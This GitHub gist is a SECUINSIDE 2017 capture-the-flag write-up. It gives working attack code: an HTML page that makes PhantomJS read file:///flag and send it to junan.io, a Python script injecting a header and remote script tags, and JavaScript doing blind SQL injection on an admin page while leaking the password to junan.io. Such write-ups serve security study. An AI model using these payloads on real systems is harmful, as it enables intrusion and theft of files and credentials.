Skip to content

Instantly share code, notes, and snippets.

@junorouse

junorouse/secuinside-2017-writeup.md

Last active July 5, 2017 14:18
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save junorouse/90f451403d65969312bd49a2963a7ed8 to your computer and use it in GitHub Desktop.
Save junorouse/90f451403d65969312bd49a2963a7ed8 to your computer and use it in GitHub Desktop.
Download ZIP
SECUINSIDE Challenge Writeup
Raw
secuinside-2017-writeup.md

source code

https://github.com/junorouse/secuinside2017-pwn1
https://github.com/junorouse/secuinside2017-web1
https://github.com/junorouse/secuinside2017-web-2

phantom of the opera

desc: caches are deleted every 3 minutes.

caching this file and load http/../cache/4b975377a178a70030f2a85daf497836.html

http://junan.io/exploit/last.html

cache/4b975377a178a70030f2a85daf497836.html

<!DOCTYPE html><body><script src=http://code.jquery.com/jquery-3.2.1.min.js></script><script>$.ajax({url:"file:///flag",success:function(a){(new Image).src="http://junan.io/flag_"+a},async:!1}),console.log("A")</script>

52.78.36.198 - - [28/Jun/2017:21:12:01 -0400] "GET /flag_SECU[flag] HTTP/1.1" 404 152 "-" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"

file:// <-> file:// (Same origin)
relative path without file protocol --> file://[relative path]

flag : SECU[In sl33p h3 s4ng t0 m3, in dr34m5 h3 c4m3]
flag: SECU[phantom_js_is_magicalllllll~!@~!]

Pine Apple CS

from requests import get, post

headers = {
	'Cookie': 'token=a6de6ffba2040055e3ba861aae1f9953012c48cc; user_id=junoim;'
}

data ={
	'title': 'last\nAccess-Control-Allow-Origin: *\n',
	'content': '''
	<script src="//code.jquery.com/jquery-3.2.1.min.js"></script>
<script src="http://junan.io/exploit/exp.js"></script>
'''
}

c = post("http://pine-apple.kr/support.php", headers=headers, data=data)

print c.content
//http://52.78.46.132/read.php?idx_token=d83ef283f340426486f9befde2381d1c83fa40dd
function go(i, j) {
	var token="9974370887355d2388f8044de58eac6db0ce50b2";
    $.ajax({
        type: 'get',
        url: "http://localhost/admin/read.php?idx_token="+token+"%27%20%26%26%20(ascii(substr((select user_pw from users where user_id='admin'),"+j+",1)))="+i+"%23",
        //url: 'http://localhost/admin/read.php?idx_token'
            async: false,
        success: function(data) {
            var x = new Image();
            x.src='http://junan.io/x_'+String.fromCharCode(i);
            console.log(data);
            },
        error: function(err) {
 //           var x = new Image();
//            x.src='http://junan.io/x_error';
            }
    });
}

var j=2; // bsqli index

    for (i=32; i<127; i++) {
        go(i, j);
		}

origin: localhost != 127.0.0.1

flag : SECU[D0_U_L1K3_X55_C4LLS?]

Kimchi-Vm

caches are deleted every minutes.

Binja's Exploit

Reversing

Pwnable

reversing flag : SECU[I have gold medal in AcM ICPC]
pwnable flag : SECU[You pwned my k-vm system bb]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment